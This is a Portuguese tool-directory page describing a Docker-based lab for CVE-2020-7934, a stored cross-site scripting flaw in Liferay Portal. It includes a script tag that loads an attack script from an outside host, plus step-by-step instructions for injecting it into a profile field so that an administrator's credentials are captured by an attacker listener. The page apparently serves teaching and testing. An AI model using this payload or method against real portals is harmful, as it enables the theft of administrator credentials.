Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
audit-xss-cve-2020-7934 — Exploit XSS baseado em Docker para CVE-2020-7934 direcionado ao portal Liferay. Demonstra cross-site scripting armazenado através de campos de perfil de usuário para roubar credenciais de administrador. | Kitploit
Ferramentas/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

Exploit XSS baseado em Docker para CVE-2020-7934 direcionado ao portal Liferay. Demonstra cross-site scripting armazenado através de campos de perfil de usuário para roubar credenciais de administrador.

Ver Repositório
45há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE 2020-7934

Como executar o CVE

Requisitos

  1. docker

Observações

é possível colocar o script de ataque online (dado o código js) http://yourjavascript.com/ Nosso script Js online para o ataque html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

Comandos para configuração

  1. vá para a pasta raiz deste projeto
  2. execute "sudo docker-compose up --build"
  3. novo terminal: execute "docker inspect liferay" ==> e copie o valor do IPAddress
  4. novo terminal: execute "python api_attacker.py"
  5. abra um navegador e vá para "http://IPAddress:8080" ==> você deve obter o portal liferay como resposta
  6. para parar e deletar containers use "sudo docker-compose rm"

Instruções para o ataque

  1. Registre-se no liferay como um usuário, faça login e, na seção "sites disponíveis", junte-se ao site "liferay".
  2. Altere o "sobrenome" em um script JS (diretamente () ou através de um "src =" http ... "")
  3. Faça login como administrador liferay (username: [email protected], password: test)
  4. Vá para sites disponíveis e clique em "liferay", a página pública deste site será aberta.
  5. Vá para a nova página, um menu será aberto à direita, clique em membership.
  6. Selecione o usuário registrado no passo 1. Nesse momento, o script será executado. 5.1) No script attack.js, a página solicitará as credenciais.
  7. No terminal do passo 5 (dos Comandos para configuração) será impresso o username/password inserido em 5.1 (pelo admin) )
Baixar ferramenta